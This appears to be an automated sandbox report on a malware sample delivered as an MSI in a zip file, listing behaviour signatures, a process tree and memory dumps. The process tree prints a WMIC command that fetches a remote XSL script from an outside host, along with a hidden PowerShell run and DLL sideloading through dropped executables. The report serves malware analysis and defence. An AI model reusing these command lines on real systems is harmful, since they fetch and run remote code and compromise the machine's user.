Resubmissions

13-11-2019 07:33

191113-s6xvalyd5a 0

12-11-2019 15:34

191112-9te2mt6rbs 0

04-11-2019 16:22

191104-pvpshym7va 0

Analysis

  • max time kernel: 113s
  • max time network: 121s
  • resource: win7v191014

General

  • Target: test.zip
  • Sample: 191113-s6xvalyd5a
  • SHA256: 72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Score
N/A

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
  • Drops file in system dir 23 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Executes dropped EXE 3 IoCs
  • Uses Volume Shadow Copy WMI provider 1 IoCs
  • Uses Volume Shadow Copy Service COM API 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Drops startup file 1 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    • Discovering connected drives
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of AdjustPrivilegeToken
    PID:1440
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1092
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding 5E3227A19605220E5186D9912EDC7DB2
    • Suspicious use of WriteProcessMemory
    PID:1900
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1408
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-371149877153113590519141328335344489392592268871093106461-6052991441860297665"
    • Suspicious use of SetWindowsHookEx
    PID:1868
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding C963818129A4BB594929C274CEE1BC50
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1832
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    • Suspicious behavior: EnumeratesProcesses
    • Uses Task Scheduler COM API
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Uses Volume Shadow Copy WMI provider
    • Uses Volume Shadow Copy Service COM API
    • Suspicious use of AdjustPrivilegeToken
    • Drops startup file
    PID:2068
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-789858890-18778572872138973017121338278-555810284-794943520-623910661475340320"
    • Suspicious use of SetWindowsHookEx
    PID:2076
  • C:\Users\Admin\AppData\Local\Temp\lc815F.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc815F.tmp"
    • Executes dropped EXE
    PID:2196
  • C:\Users\Admin\AppData\Roaming\XEcdt\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\XEcdt\nvsmartmaxapp.exe"
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:2436
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    • Suspicious behavior: EnumeratesProcesses
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:2456
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {ECCABB4A-4F71-4F4A-ABB0-9F224DC46EF0} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    • Suspicious use of WriteProcessMemory
    PID:2608
  • C:\Users\Admin\AppData\Roaming\XEcdt\gup.exe
    C:\Users\Admin\AppData\Roaming\XEcdt\gup.exe
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:2640
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    • Loads dropped DLL
    PID:2664

Network

MITRE ATT&CK Enterprise v15


Downloads

  • memory/1092-13-0x0000000001FA0000-0x0000000001FA4000-memory.dmp (16KB)
  • memory/1092-11-0x0000000001650000-0x0000000001654000-memory.dmp (16KB)
  • memory/1092-12-0x00000000010E0000-0x00000000010E4000-memory.dmp (16KB)
  • memory/1092-15-0x00000000010E0000-0x00000000010E4000-memory.dmp (16KB)
  • memory/1092-16-0x0000000001FA0000-0x0000000001FA4000-memory.dmp (16KB)
  • memory/1440-18-0x00000000022B0000-0x00000000022B4000-memory.dmp (16KB)
  • memory/1440-17-0x00000000040A0000-0x00000000040A4000-memory.dmp (16KB)
  • memory/1440-0-0x00000000040A0000-0x00000000040A4000-memory.dmp (16KB)
  • memory/2068-20-0x000000001C500000-0x000000001C504000-memory.dmp (16KB)
  • memory/2068-21-0x000000001C500000-0x000000001C504000-memory.dmp (16KB)
  • memory/2456-29-0x0000000003680000-0x0000000003691000-memory.dmp (68KB)
  • memory/2456-28-0x0000000003270000-0x0000000003281000-memory.dmp (68KB)
  • memory/2456-25-0x00000000000C0000-0x00000000000C1000-memory.dmp (4KB)